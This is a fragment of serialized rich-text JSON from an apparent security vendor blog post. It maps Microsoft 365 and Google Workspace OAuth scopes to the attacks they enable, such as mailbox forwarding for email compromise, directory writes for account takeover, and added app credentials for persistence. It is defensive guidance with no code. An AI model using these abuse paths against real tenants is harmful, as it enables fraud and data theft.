assessment.",[],{},{"nodeType":169,"data":290685,"content":290686},{},[290687],{"nodeType":173,"value":290688,"marks":290689,"data":290690},"Capability: Backdoor Mailbox",[],{},{"nodeType":178,"data":290692,"content":290693},{},[290694],{"nodeType":173,"value":290695,"marks":290696,"data":290698},"Types of attacks: Business email compromise, account takeover via password reset email",[290697],{"type":1646},{},{"nodeType":1653,"data":290700,"content":290701},{},[290702,290724],{"nodeType":1657,"data":290703,"content":290704},{},[290705,290715],{"nodeType":1687,"data":290706,"content":290707},{},[290708],{"nodeType":178,"data":290709,"content":290710},{},[290711],{"nodeType":173,"value":290712,"marks":290713,"data":290714},"Microsoft 365 / Azure",[],{},{"nodeType":1687,"data":290716,"content":290717},{},[290718],{"nodeType":178,"data":290719,"content":290720},{},[290721],{"nodeType":173,"value":211147,"marks":290722,"data":290723},[],{},{"nodeType":1657,"data":290725,"content":290726},{},[290727,290737],{"nodeType":1687,"data":290728,"content":290729},{},[290730],{"nodeType":178,"data":290731,"content":290732},{},[290733],{"nodeType":173,"value":290734,"marks":290735,"data":290736},"MailboxSettings.ReadWrite",[],{},{"nodeType":1687,"data":290738,"content":290739},{},[290740],{"nodeType":178,"data":290741,"content":290742},{},[290743],{"nodeType":173,"value":290744,"marks":290745,"data":290746},"https://www.googleapis.com/auth/gmail.settings.sharing",[],{},{"nodeType":178,"data":290748,"content":290749},{},[290750],{"nodeType":173,"value":290751,"marks":290752,"data":290753},"Scopes that allow you to alter sensitive mailbox settings, such as forwarding rules, can allow malicious actors to take over a user’s mailbox by moving, deleting, or forwarding mail externally. This type of attack is typically prevalent in business email compromise (BEC) scenarios where malicious actors intercepts sensitive communications, leading to invoice fraud as an example.",[],{},{"nodeType":178,"data":290755,"content":290756},{},[290757],{"nodeType":173,"value":290758,"marks":290759,"data":290760},"The malicious actor would also be able to forward password reset email requests and delete the email from the victim’s inbox to avoid detection, thereby gaining the ability to reset credentials and gain access to third-party SaaS applications while remaining undetected.",[],{},{"nodeType":169,"data":290762,"content":290763},{},[290764],{"nodeType":173,"value":290765,"marks":290766,"data":290767},"Capability: Account Takeover, Privilege Escalation",[],{},{"nodeType":178,"data":290769,"content":290770},{},[290771],{"nodeType":173,"value":290772,"marks":290773,"data":290775},"Types of attacks: account takeover via password reset, privilege escalation via group membership change",[290774],{"type":1646},{},{"nodeType":1653,"data":290777,"content":290778},{},[290779,290800,290823,290846],{"nodeType":1657,"data":290780,"content":290781},{},[290782,290791],{"nodeType":1687,"data":290783,"content":290784},{},[290785],{"nodeType":178,"data":290786,"content":290787},{},[290788],{"nodeType":173,"value":290712,"marks":290789,"data":290790},[],{},{"nodeType":1687,"data":290792,"content":290793},{},[290794],{"nodeType":178,"data":290795,"content":290796},{},[290797],{"nodeType":173,"value":211147,"marks":290798,"data":290799},[],{},{"nodeType":1657,"data":290801,"content":290802},{},[290803,290813],{"nodeType":1687,"data":290804,"content":290805},{},[290806],{"nodeType":178,"data":290807,"content":290808},{},[290809],{"nodeType":173,"value":290810,"marks":290811,"data":290812},"Directory.ReadWrite.All",[],{},{"nodeType":1687,"data":290814,"content":290815},{},[290816],{"nodeType":178,"data":290817,"content":290818},{},[290819],{"nodeType":173,"value":290820,"marks":290821,"data":290822},"https://www.googleapis.com/auth/admin.directory.user.security",[],{},{"nodeType":1657,"data":290824,"content":290825},{},[290826,290836],{"nodeType":1687,"data":290827,"content":290828},{},[290829],{"nodeType":178,"data":290830,"content":290831},{},[290832],{"nodeType":173,"value":290833,"marks":290834,"data":290835},"User.ReadWrite.All",[],{},{"nodeType":1687,"data":290837,"content":290838},{},[290839],{"nodeType":178,"data":290840,"content":290841},{},[290842],{"nodeType":173,"value":290843,"marks":290844,"data":290845},"https://www.googleapis.com/auth/admin.directory.user",[],{},{"nodeType":1657,"data":290847,"content":290848},{},[290849,290858],{"nodeType":1687,"data":290850,"content":290851},{},[290852],{"nodeType":178,"data":290853,"content":290854},{},[290855],{"nodeType":173,"value":37,"marks":290856,"data":290857},[],{},{"nodeType":1687,"data":290859,"content":290860},{},[290861],{"nodeType":178,"data":290862,"content":290863},{},[290864],{"nodeType":173,"value":290865,"marks":290866,"data":290867},"https://www.googleapis.com/auth/admin.directory.group",[],{},{"nodeType":178,"data":290869,"content":290870},{},[290871],{"nodeType":173,"value":290872,"marks":290873,"data":290874},"The above scopes are typically used by applications that perform identity management within your cloud environment. “Directory.ReadWrite.All” for example, allows you to read and modify practically any aspect of objects within your directory. This includes group membership, password resets, and re-enabling previously disabled accounts. ",[],{},{"nodeType":178,"data":290876,"content":290877},{},[290878],{"nodeType":173,"value":290879,"marks":290880,"data":290881},"“User.ReadWrite.All” has similar privileges, albeit limited in scope to user accounts only. An attacker in a position to abuse such scopes would be able to take over accounts, escalate privileges by assigning the accounts to privileged groups, and remain under the radar by making use of previously disabled accounts.",[],{},{"nodeType":169,"data":290883,"content":290884},{},[290885],{"nodeType":173,"value":290886,"marks":290887,"data":290888},"Capability: Email Access",[],{},{"nodeType":178,"data":290890,"content":290891},{},[290892],{"nodeType":173,"value":290695,"marks":290893,"data":290895},[290894],{"type":1646},{},{"nodeType":1653,"data":290897,"content":290898},{},[290899,290920],{"nodeType":1657,"data":290900,"content":290901},{},[290902,290911],{"nodeType":1687,"data":290903,"content":290904},{},[290905],{"nodeType":178,"data":290906,"content":290907},{},[290908],{"nodeType":173,"value":290712,"marks":290909,"data":290910},[],{},{"nodeType":1687,"data":290912,"content":290913},{},[290914],{"nodeType":178,"data":290915,"content":290916},{},[290917],{"nodeType":173,"value":211147,"marks":290918,"data":290919},[],{},{"nodeType":1657,"data":290921,"content":290922},{},[290923,290933],{"nodeType":1687,"data":290924,"content":290925},{},[290926],{"nodeType":178,"data":290927,"content":290928},{},[290929],{"nodeType":173,"value":290930,"marks":290931,"data":290932},"Mail.ReadWrite",[],{},{"nodeType":1687,"data":290934,"content":290935},{},[290936],{"nodeType":178,"data":290937,"content":290938},{},[290939],{"nodeType":173,"value":290940,"marks":290941,"data":290942},"https://mail.google.com/",[],{},{"nodeType":178,"data":290944,"content":290945},{},[290946],{"nodeType":173,"value":290947,"marks":290948,"data":290949},"Scopes that have direct access to mailboxes naturally provide risk in terms of a malicious actor’s ability to read sensitive information, and access to third-party SaaS applications’ password reset email requests, not unlike the ‘Backdoor Mailbox’ capability.",[],{},{"nodeType":169,"data":290951,"content":290952},{},[290953],{"nodeType":173,"value":290954,"marks":290955,"data":290956},"Capability: Access as User",[],{},{"nodeType":178,"data":290958,"content":290959},{},[290960],{"nodeType":173,"value":290961,"marks":290962,"data":290964},"Types of attacks: Gain access to resources available to the particular account",[290963],{"type":1646},{},{"nodeType":1653,"data":290966,"content":290967},{},[290968,290989],{"nodeType":1657,"data":290969,"content":290970},{},[290971,290980],{"nodeType":1687,"data":290972,"content":290973},{},[290974],{"nodeType":178,"data":290975,"content":290976},{},[290977],{"nodeType":173,"value":290712,"marks":290978,"data":290979},[],{},{"nodeType":1687,"data":290981,"content":290982},{},[290983],{"nodeType":178,"data":290984,"content":290985},{},[290986],{"nodeType":173,"value":211147,"marks":290987,"data":290988},[],{},{"nodeType":1657,"data":290990,"content":290991},{},[290992,291002],{"nodeType":1687,"data":290993,"content":290994},{},[290995],{"nodeType":178,"data":290996,"content":290997},{},[290998],{"nodeType":173,"value":290999,"marks":291000,"data":291001},"Directory.AccessAsUser.All",[],{},{"nodeType":1687,"data":291003,"content":291004},{},[291005],{"nodeType":178,"data":291006,"content":291007},{},[291008],{"nodeType":173,"value":291009,"marks":291010,"data":291011},"https://www.googleapis.com/auth/cloud-platform",[],{},{"nodeType":178,"data":291013,"content":291014},{},[291015],{"nodeType":173,"value":291016,"marks":291017,"data":291018},"Scopes that provide “Access as User” privileges are typically used by applications that need to impersonate a user and their access permissions. This may not sound super risky at the surface level, but if you consider that a user may have access to shared resources across an organization, the risk starts to add up.",[],{},{"nodeType":178,"data":291020,"content":291021},{},[291022,291026,291033,291037,291044],{"nodeType":173,"value":291023,"marks":291024,"data":291025},"One example of the impact of such scopes is noted in Chris Moberly's incredibly informative ",[],{},{"nodeType":186,"data":291027,"content":291029},{"uri":291028},"https://initblog.com/2020/gcp-post-exploitation/",[291030],{"nodeType":173,"value":148689,"marks":291031,"data":291032},[],{},{"nodeType":173,"value":291034,"marks":291035,"data":291036}," where the “",[],{},{"nodeType":186,"data":291038,"content":291039},{"uri":291009},[291040],{"nodeType":173,"value":291009,"marks":291041,"data":291043},[291042],{"type":194},{},{"nodeType":173,"value":291045,"marks":291046,"data":291047},"” scope is abused to authenticate to practically all API functions within Google Cloud, and in turn access the owner’s data.",[],{},{"nodeType":169,"data":291049,"content":291050},{},[291051],{"nodeType":173,"value":291052,"marks":291053,"data":291054},"Capability: OneDrive / SharePoint /  Google Drive File Access",[],{},{"nodeType":178,"data":291056,"content":291057},{},[291058],{"nodeType":173,"value":291059,"marks":291060,"data":291062},"Types of attacks: Gain access to all files stored within the OneDrive/SharePoint or Google Drive services",[291061],{"type":1646},{},{"nodeType":1653,"data":291064,"content":291065},{},[291066,291087,291110,291133],{"nodeType":1657,"data":291067,"content":291068},{},[291069,291078],{"nodeType":1687,"data":291070,"content":291071},{},[291072],{"nodeType":178,"data":291073,"content":291074},{},[291075],{"nodeType":173,"value":290712,"marks":291076,"data":291077},[],{},{"nodeType":1687,"data":291079,"content":291080},{},[291081],{"nodeType":178,"data":291082,"content":291083},{},[291084],{"nodeType":173,"value":211147,"marks":291085,"data":291086},[],{},{"nodeType":1657,"data":291088,"content":291089},{},[291090,291100],{"nodeType":1687,"data":291091,"content":291092},{},[291093],{"nodeType":178,"data":291094,"content":291095},{},[291096],{"nodeType":173,"value":291097,"marks":291098,"data":291099},"Files.ReadWrite.All / Files.Read.All",[],{},{"nodeType":1687,"data":291101,"content":291102},{},[291103],{"nodeType":178,"data":291104,"content":291105},{},[291106],{"nodeType":173,"value":291107,"marks":291108,"data":291109},"https://www.googleapis.com/auth/drive",[],{},{"nodeType":1657,"data":291111,"content":291112},{},[291113,291123],{"nodeType":1687,"data":291114,"content":291115},{},[291116],{"nodeType":178,"data":291117,"content":291118},{},[291119],{"nodeType":173,"value":291120,"marks":291121,"data":291122},"Sites.ReadWrite.All / Sites.Read.All",[],{},{"nodeType":1687,"data":291124,"content":291125},{},[291126],{"nodeType":178,"data":291127,"content":291128},{},[291129],{"nodeType":173,"value":291130,"marks":291131,"data":291132},"https://www.googleapis.com/auth/drive.readonly",[],{},{"nodeType":1657,"data":291134,"content":291135},{},[291136,291145],{"nodeType":1687,"data":291137,"content":291138},{},[291139],{"nodeType":178,"data":291140,"content":291141},{},[291142],{"nodeType":173,"value":13836,"marks":291143,"data":291144},[],{},{"nodeType":1687,"data":291146,"content":291147},{},[291148],{"nodeType":178,"data":291149,"content":291150},{},[291151],{"nodeType":173,"value":291152,"marks":291153,"data":291154},"https://www.googleapis.com/auth/drive.file",[],{},{"nodeType":178,"data":291156,"content":291157},{},[291158],{"nodeType":173,"value":291159,"marks":291160,"data":291161},"OneDrive, SharePoint, and Google Drive are likely the services where some of the most sensitive content in your organization resides. Scopes that provide access to document stores should thus be treated as having access to critical information (think PII, trade secrets, acquisition deals).",[],{},{"nodeType":178,"data":291163,"content":291164},{},[291165],{"nodeType":173,"value":291166,"marks":291167,"data":291168},"Document theft would be possible with the read-only scopes. However, a malicious actor with ‘write’ permissions would be able to expand into another level of attacks which involves manipulating the content of documents. This could include altering banking details on invoices, or the inclusion of malicious code in macros embedded in the documents, leading to code execution and further compromise.",[],{},{"nodeType":169,"data":291170,"content":291171},{},[291172],{"nodeType":173,"value":291173,"marks":291174,"data":291175},"Capability: Privilege Escalation, Persistence",[],{},{"nodeType":178,"data":291177,"content":291178},{},[291179],{"nodeType":173,"value":291180,"marks":291181,"data":291183},"Types of attacks: Adding credentials, backdooring applications",[291182],{"type":1646},{},{"nodeType":1653,"data":291185,"content":291186},{},[291187,291208],{"nodeType":1657,"data":291188,"content":291189},{},[291190,291199],{"nodeType":1687,"data":291191,"content":291192},{},[291193],{"nodeType":178,"data":291194,"content":291195},{},[291196],{"nodeType":173,"value":290712,"marks":291197,"data":291198},[],{},{"nodeType":1687,"data":291200,"content":291201},{},[291202],{"nodeType":178,"data":291203,"content":291204},{},[291205],{"nodeType":173,"value":211147,"marks":291206,"data":291207},[],{},{"nodeType":1657,"data":291209,"content":291210},{},[291211,291221],{"nodeType":1687,"data":291212,"content":291213},{},[291214],{"nodeType":178,"data":291215,"content":291216},{},[291217],{"nodeType":173,"value":291218,"marks":291219,"data":291220},"Application.ReadWrite.All",[],{},{"nodeType":1687,"data":291222,"content":291223},{},[291224],{"nodeType":178,"data":291225,"content":291226},{},[291227],{"nodeType":173,"value":291009,"marks":291228,"data":291229},[],{},{"nodeType":178,"data":291231,"content":291232},{},[291233],{"nodeType":173,"value":291234,"marks":291235,"data":291236},"The \"Application.ReadWrite.All\" scope could enable a malicious actor to add credentials to applications already present in your tenant, paving the way for privilege escalation.As an example, if a malicious actor compromises an application with this scope, they could add credentials to any other application in your tenant that has the \"Directory.ReadWrite.All\" scope, thereby gaining access to its data and privileges.",[],{},{"nodeType":178,"data":291238,"content":291239},{},[291240],{"nodeType":173,"value":291241,"marks":291242,"data":291243},"This naturally lends itself to a malicious actor gaining persistence via the addition of credentials to other applications. This would allow them to authenticate as these other applications within your Azure or Google tenants, and allow them to assume those applications’ privileges, too.",[],{},{"nodeType":169,"data":291245,"content":291246},{},[291247],{"nodeType":173,"value":291248,"marks":291249,"data":291250},"Capability: Teams chat history / OneNote access",[],{},{"nodeType":178,"data":291252,"content":291253},{},[291254],{"nodeType":173,"value":291255,"marks":291256,"data":291258},"Types of attacks: Gain access to users’ teams chat histories or OneNote notes",[291257],{"type":1646},{},{"nodeType":1653,"data":291260,"content":291261},{},[291262,291274,291287],{"nodeType":1657,"data":291263,"content":291264},{},[291265],{"nodeType":1687,"data":291266,"content":291267},{},[291268],{"nodeType":178,"data":291269,"content":291270},{},[291271],{"nodeType":173,"value":290712,"marks":291272,"data":291273},[],{},{"nodeType":1657,"data":291275,"content":291276},{},[291277],{"nodeType":1687,"data":291278,"content":291279},{},[291280],{"nodeType":178,"data":291281,"content":291282},{},[291283],{"nodeType":173,"value":291284,"marks":291285,"data":291286},"Chat.ReadWrite / Chat.ReadWrite.All",[],{},{"nodeType":1657,"data":291288,"content":291289},{},[291290],{"nodeType":1687,"data":291291,"content":291292},{},[291293],{"nodeType":178,"data":291294,"content":291295},{},[291296],{"nodeType":173,"value":291297,"marks":291298,"data":291299},"Notes.ReadWrite.All",[],{},{"nodeType":178,"data":291301,"content":291302},{},[291303],{"nodeType":173,"value":291304,"marks":291305,"data":291306},"If a malicious actor were to gain access to your meeting notes or Teams chat histories, what would they find? Perhaps passwords shared between team members or confidential proprietary information? With the scopes designated with ‘All’, a malicious actor will be able to pull the Teams or notes history of all users within the organization.",[],{},{"nodeType":169,"data":291308,"content":291309},{},[291310],{"nodeType":173,"value":291311,"marks":291312,"data":291313},"I found an integration we use that includes these dangerous scopes… now what?",[],{},{"nodeType":178,"data":291315,"content":291316},{},[291317],{"nodeType":173,"value":291318,"marks":291319,"data":291320},"While the scopes listed here are definitely some of the most dangerous when granted to third-party integrations, they will usually be paired with legitimate apps offering legitimate functionality. But then how do you determine which integrations need further scrutiny?",[],{},{"nodeType":178,"data":291322,"content":291323},{},[291324,291328,291337],{"nodeType":173,"value":291325,"marks":291326,"data":291327},"The biggest red flag you might come across would be an unrecognized or unapproved integration making use of these scopes, as it may be associated with attacks such as ",[],{},{"nodeType":1698,"data":291329,"content":291332},{"target":291330},{"sys":291331},{"id":269414,"type":317,"linkType":318},[291333],{"nodeType":173,"value":8091,"marks":291334,"data":291336},[291335],{"type":194},{},{"nodeType":173,"value":197,"marks":291338,"data":291339},[],{},{"nodeType":178,"data":291341,"content":291342},{},[291343],{"nodeType":173,"value":291344,"marks":291345,"data":291346},"Determining their legitimacy should be the number one priority. This would hopefully be done via your security team having performed due diligence and permissions review, and ascertaining whether the app has legitimate use within the business. As with the consent phishing example, a user may have granted a third-party app access to their mailbox or OneDrive files without fully grasping the implications of their actions.",[],{},{"nodeType":178,"data":291348,"content":291349},{},[291350],{"nodeType":173,"value":291351,"marks":291352,"data":291353},"Push provides visibility to the security team whenever a new third-party integration is detected by way of notifications via a designated Slack or Teams channel. This may help your security team stay on top of unsanctioned apps by providing the ability to remove integrations which may provide unnecessary risk to your organization.",[],{},{"nodeType":178,"data":291355,"content":291356},{},[291357,291361,291370],{"nodeType":173,"value":291358,"marks":291359,"data":291360},"\nIf you’re interested in further reading about how attackers can compromise your environment through SaaS apps, ",[],{},{"nodeType":1698,"data":291362,"content":291365},{"target":291363},{"sys":291364},{"id":269371,"type":317,"linkType":318},[291366],{"nodeType":173,"value":270319,"marks":291367,"data":291369},[291368],{"type":194},{},{"nodeType":173,"value":291371,"marks":291372,"data":291373}," may shed some light on the topic. ",[],{},{"nodeType":312,"data":291375,"content":291378},{"target":291376},{"sys":291377},{"id":169040,"type":317,"linkType":318},[],{"nodeType":178,"data":291380,"content":291381},{},[291382],{"nodeType":173,"value":37,"marks":291383,"data":291384},[],{},{"entries":291386},{"inline":291387,"hyperlink":291388,"block":291393},[],[291389,291391],{"sys":291390,"__typename":1528,"title":271616,"slug":271619},{"id":269414},{"sys":291392,"__typename":1528,"title":270678,"slug":270680},{"id":269371},[291394],{"sys":291395,"__typename":15269,"type":112637,"ctaText":192192,"buttonLabel":192193,"buttonColour":15273,"buttonUrl":118},{"id":169040},{"items":291397},[291398,292538],{"__typename":1528,"sys":291399,"content":291400,"title":270678,"synopsis":269387,"hashTags":118,"publishedDate":270679,"slug":270680,"tagsCollection":292528,"authorsCollection":292534},{"id":269371},{"json":291401},{"nodeType":165,"data":291402,"content":291403},{},[291404,291410,291416,291422,291428,291446,291452,291457,291463,291469,291475,291503,291508,291514,291622,291628,291634,291868,291874,291880,291886,291912,291918,291924,291929,291935,291940,291946,291952,291958,291964,291970,291976,291982,291988,291993,291999,292012,292018,292024,292050,292056,292072,292078,292084,292090,292096,292127,292143,292191,292197,292203,292219,292235,292241,292267,292273,292279,292285,292291,292297,292303,292309,292325,292330,292336,292351,292357,292363,292368,292374,292380,292385,292391,292427,292433,292438,292444,292449,292455,292461,292487,292493,292499,292505,292511,292517,292522],{"nodeType":178,"data":291405,"content":291406},{},[291407],{"nodeType":173,"value":269380,"marks":291408,"data":291409},[],{},{"nodeType":178,"data":291411,"content":291412},{},[291413],{"nodeType":173,"value":269387,"marks":291414,"data":291415},[],{},{"nodeType":169,"data":291417,"content":291418},{},[291419],{"nodeType":173,"value":39940,"marks":291420,"data":291421},[],{},{"nodeType":235,"data":291423,"content":291424},{},[291425],{"nodeType":173,"value":269400,"marks":291426,"data":291427},[],{},{"nodeType":178,"data":291429,"content":291430},{},[291431,291434,291443],{"nodeType":173,"value":269407,"marks":291432,"data":291433},[],{},{"nodeType":1698,"data":291435,"content":291438},{"target":291436},{"sys":291437},{"id":269414,"type":317,"linkType":318},[291439],{"nodeType":173,"value":269417,"marks":291440,"data":291442},[291441],{"type":194},{},{"nodeType":173,"value":269422,"marks":291444,"data":291445},[],{},{"nodeType":178,"data":291447,"content":291448},{},[291449],{"nodeType":173,"value":269429,"marks":291450,"data":291451},[],{},{"nodeType":312,"data":291453,"content":291456},{"target":291454},{"sys":291455},{"id":269436,"type":317,"linkType":318},[],{"nodeType":235,"data":291458,"content":291459},{},[291460],{"nodeType":173,"value":269442,"marks":291461,"data":291462},[],{},{"nodeType":178,"data":291464,"content":291465},{},[291466],{"nodeType":173,"value":269449,"marks":291467,"data":291468},[],{},{"nodeType":178,"data":291470,"content":291471},{},[291472],{"nodeType":173,"value":269456,"marks":291473,"data":291474},[],{},{"nodeType":178,"data":291476,"content":291477},{},[291478,291481,291488,291491,291500],{"nodeType":173,"value":269463,"marks":291479,"data":291480},[],{},{"nodeType":186,"data":291482,"content":291483},{"uri":269468},[291484],{"nodeType":173,"value":269471,"marks":291485,"data":291487},[291486],{"type":194},{},{"nodeType":173,"value":269476,"marks":291489,"data":291490},[],{},{"nodeType":1698,"data":291492,"content":291495},{"target":291493},{"sys":291494},{"id":269483,"type":317,"linkType":318},[291496],{"nodeType":173,"value":269486,"marks":291497,"data":291499},[291498],{"type":194},{},{"nodeType":173,"value":269491,"marks":291501,"data":291502},[],{},{"nodeType":312,"data":291504,"content":291507},{"target":291505},{"sys":291506},{"id":269498,"type":317,"linkType":318},[],{"nodeType":178,"data":291509,"content":291510},{},[291511],{"nodeType":173,"value":269504,"marks":291512,"data":291513},[],{},{"nodeType":1653,"data":291515,"content":291516},{},[291517,291538,291559,291580,291601],{"nodeType":1657,"data":291518,"content":291519},{},[291520,291529],{"nodeType":1687,"data":291521,"content":291522},{},[291523],{"nodeType":178,"data":291524,"content":291525},{},[291526],{"nodeType":173,"value":269520,"marks":291527,"data":291528},[],{},{"nodeType":1687,"data":291530,"content":291531},{},[291532],{"nodeType":178,"data":291533,"content":291534},{},[291535],{"nodeType":173,"value":269530,"marks":291536,"data":291537},[],{},{"nodeType":1657,"data":291539,"content":291540},{},[291541,291550],{"nodeType":1687,"data":291542,"content":291543},{},[291544],{"nodeType":178,"data":291545,"content":291546},{},[291547],{"nodeType":173,"value":269543,"marks":291548,"data":291549},[],{},{"nodeType":1687,"data":291551,"content":291552},{},[291553],{"nodeType":178,"data":291554,"content":291555},{},[291556],{"nodeType":173,"value":269553,"marks":291557,"data":291558},[],{},{"nodeType":1657,"data":291560,"content":291561},{},[291562,291571],{"nodeType":1687,"data":291563,"content":291564},{},[291565],{"nodeType":178,"data":291566,"content":291567},{},[291568],{"nodeType":173,"value":269566,"marks":291569,"data":291570},[],{},{"nodeType":1687,"data":291572,"content":291573},{},[291574],{"nodeType":178,"data":291575,"content":291576},{},[291577],{"nodeType":173,"value":269576,"marks":291578,"data":291579},[],{},{"nodeType":1657,"data":291581,"content":291582},{},[291583,291592],{"nodeType":1687,"data":291584,"content":291585},{},[291586],{"nodeType":178,"data":291587,"content":291588},{},[291589],{"nodeType":173,"value":269589,"marks":291590,"data":291591},[],{},{"nodeType":1687,"data":291593,"content":291594},{},[291595],{"nodeType":178,"data":291596,"content":291597},{},[291598],{"nodeType":173,"value":269599,"marks":291599,"data":291600},[],{},{"nodeType":1657,"data":291602,"content":291603},{},[291604,291613],{"nodeType":1687,"data":291605,"content":291606},{},[291607],{"nodeType":178,"data":291608,"content":291609},{},[291610],{"nodeType":173,"value":269612,"marks":291611,"data":291612},[],{},{"nodeType":1687,"data":291614,"content":291615},{},[291616],{"nodeType":178,"data":291617,"content":291618},{},[291619],{"nodeType":173,"value":269622,"marks":291620,"data":291621},[],{},{"nodeType":178,"data":291623,"content":291624},{},[291625],{"nodeType":173,"value":269629,"marks":291626,"data":291627},[],{},{"nodeType":178,"data":291629,"content":291630},{},[291631],{"nodeType":173,"value":269636,"marks":291632,"data":291633},[],{},{"nodeType":1653,"data":291635,"content":291636},{},[291637,291658,291679,291700,291721,291742,291763,291784,291805,291826,291847],{"nodeType":1657,"data":291638,"content":291639},{},[291640,291649],{"nodeType":1687,"data":291641,"content":291642},{},[291643],{"nodeType":178,"data":291644,"content":291645},{},[291646],{"nodeType":173,"value":269652,"marks":291647,"data":291648},[],{},{"nodeType":1687,"data":291650,"content":291651},{},[291652],{"nodeType":178,"data":291653,"content":291654},{},[291655],{"nodeType":173,"value":269662,"marks":291656,"data":291657},[],{},{"nodeType":1657,"data":291659,"content":291660},{},[291661,291670],{"nodeType":1687,"data":291662,"content":291663},{},[291664],{"nodeType":178,"data":291665,"content":291666},{},[291667],{"nodeType":173,"value":269675,"marks":291668,"data":291669},[],{},{"nodeType":1687,"data":291671,"content":291672},{},[291673],{"nodeType":178,"data":291674,"content":291675},{},[291676],{"nodeType":173,"value":269685,"marks":291677,"data":291678},[],{},{"nodeType":1657,"data":291680,"content":291681},{},[291682,291691],{"nodeType":1687,"data":291683,"content":291684},{},[291685],{"nodeType":178,"data":291686,"content":291687},{},[291688],{"nodeType":173,"value":269698,"marks":291689,"data":291690},[],{},{"nodeType":1687,"data":291692,"content":291693},{},[291694],{"nodeType":178,"data":291695,"content":291696},{},[291697],{"nodeType":173,"value":269708,"marks":291698,"data":291699},[],{},{"nodeType":1657,"data":291701,"content":291702},{},[291703,291712],{"nodeType":1687,"data":291704,"content":291705},{},[291706],{"nodeType":178,"data":291707,"content":291708},{},[291709],{"nodeType":173,"value":269721,"marks":291710,"data":291711},[],{},{"nodeType":1687,"data":291713,"content":291714},{},[291715],{"nodeType":178,"data":291716,"content":291717},{},[291718],{"nodeType":173,"value":269731,"marks":291719,"data":291720},[],{},{"nodeType":1657,"data":291722,"content":291723},{},[291724,291733],{"nodeType":1687,"data":291725,"content":291726},{},[291727],{"nodeType":178,"data":291728,"content":291729},{},[291730],{"nodeType":173,"value":269744,"marks":291731,"data":291732},[],{},{"nodeType":1687,"data":291734,"content":291735},{},[291736],{"nodeType":178,"data":291737,"content":291738},{},[291739],{"nodeType":173,"value":269754,"marks":291740,"data":291741},[],{},{"nodeType":1657,"data":291743,"content":291744},{},[291745,291754],{"nodeType":1687,"data":291746,"content":291747},{},[291748],{"nodeType":178,"data":291749,"content":291750},{},[291751],{"nodeType":173,"value":269767,"marks":291752,"data":291753},[],{},{"nodeType":1687,"data":291755,"content":291756},{},[291757],{"nodeType":178,"data":291758,"content":291759},{},[291760],{"nodeType":173,"value":269777,"marks":291761,"data":291762},[],{},{"nodeType":1657,"data":291764,"content":291765},{},[291766,291775],{"nodeType":1687,"data":291767,"content":291768},{},[291769],{"nodeType":178,"data":291770,"content":291771},{},[291772],{"nodeType":173,"value":269790,"marks":291773,"data":291774},[],{},{"nodeType":1687,"data":291776,"content":291777},{},[291778],{"nodeType":178,"data":291779,"content":291780},{},[291781],{"nodeType":173,"value":269800,"marks":291782,"data":291783},[],{},{"nodeType":1657,"data":291785,"content":291786},{},[291787,291796],{"nodeType":1687,"data":291788,"content":291789},{},[291790],{"nodeType":178,"data":291791,"content":291792},{},[291793],{"nodeType":173,"value":269813,"marks":291794,"data":291795},[],{},{"nodeType":1687,"data":291797,"content":291798},{},[291799],{"nodeType":178,"data":291800,"content":291801},{},[291802],{"nodeType":173,"value":269823,"marks":291803,"data":291804},[],{},{"nodeType":1657,"data":291806,"content":291807},{},[291808,291817],{"nodeType":1687,"data":291809,"content":291810},{},[291811],{"nodeType":178,"data":291812,"content":291813},{},[291814],{"nodeType":173,"value":269836,"marks":291815,"data":291816},[],{},{"nodeType":1687,"data":291818,"content":291819},{},[291820],{"nodeType":178,"data":291821,"content":291822},{},[291823],{"nodeType":173,"value":269846,"marks":291824,"data":291825},[],{},{"nodeType":1657,"data":291827,"content":291828},{},[291829,291838],{"nodeType":1687,"data":291830,"content":291831},{},[291832],{"nodeType":178,"data":291833,"content":291834},{},[291835],{"nodeType":173,"value":269859,"marks":291836,"data":291837},[],{},{"nodeType":1687,"data":291839,"content":291840},{},[291841],{"nodeType":178,"data":291842,"content":291843},{},[291844],{"nodeType":173,"value":269869,"marks":291845,"data":291846},[],{},{"nodeType":1657,"data":291848,"content":291849},{},[291850,291859],{"nodeType":1687,"data":291851,"content":291852},{},[291853],{"nodeType":178,"data":291854,"content":291855},{},[291856],{"nodeType":173,"value":269882,"marks":291857,"data":291858},[],{},{"nodeType":1687,"data":291860,"content":291861},{},[291862],{"nodeType":178,"data":291863,"content":291864},{},[291865],{"nodeType":173,"value":269892,"marks":291866,"data":291867},[],{},{"nodeType":178,"data":291869,"content":291870},{},[291871],{"nodeType":173,"value":269899,"marks":291872,"data":291873},[],{},{"nodeType":169,"data":291875,"content":291876},{},[291877],{"nodeType":173,"value":269906,"marks":291878,"data":291879},[],{},{"nodeType":235,"data":291881,"content":291882},{},[291883],{"nodeType":173,"value":269400,"marks":291884,"data":291885},[],{},{"nodeType":178,"data":291887,"content":291888},{},[291889,291892,291899,291902,291909],{"nodeType":173,"value":269919,"marks":291890,"data":291891},[],{},{"nodeType":186,"data":291893,"content":291894},{"uri":269924},[291895],{"nodeType":173,"value":269927,"marks":291896,"data":291898},[291897],{"type":194},{},{"nodeType":173,"value":269932,"marks":291900,"data":291901},[],{},{"nodeType":186,"data":291903,"content":291904},{"uri":269937},[291905],{"nodeType":173,"value":269940,"marks":291906,"data":291908},[291907],{"type":194},{},{"nodeType":173,"value":269945,"marks":291910,"data":291911},[],{},{"nodeType":178,"data":291913,"content":291914},{},[291915],{"nodeType":173,"value":269952,"marks":291916,"data":291917},[],{},{"nodeType":178,"data":291919,"content":291920},{},[291921],{"nodeType":173,"value":269959,"marks":291922,"data":291923},[],{},{"nodeType":312,"data":291925,"content":291928},{"target":291926},{"sys":291927},{"id":269966,"type":317,"linkType":318},[],{"nodeType":178,"data":291930,"content":291931},{},[291932],{"nodeType":173,"value":269972,"marks":291933,"data":291934},[],{},{"nodeType":312,"data":291936,"content":291939},{"target":291937},{"sys":291938},{"id":269979,"type":317,"linkType":318},[],{"nodeType":178,"data":291941,"content":291942},{},[291943],{"nodeType":173,"value":269985,"marks":291944,"data":291945},[],{},{"nodeType":178,"data":291947,"content":291948},{},[291949],{"nodeType":173,"value":269992,"marks":291950,"data":291951},[],{},{"nodeType":235,"data":291953,"content":291954},{},[291955],{"nodeType":173,"value":269442,"marks":291956,"data":291957},[],{},{"nodeType":178,"data":291959,"content":291960},{},[291961],{"nodeType":173,"value":270005,"marks":291962,"data":291963},[],{},{"nodeType":169,"data":291965,"content":291966},{},[291967],{"nodeType":173,"value":270012,"marks":291968,"data":291969},[],{},{"nodeType":235,"data":291971,"content":291972},{},[291973],{"nodeType":173,"value":269400,"marks":291974,"data":291975},[],{},{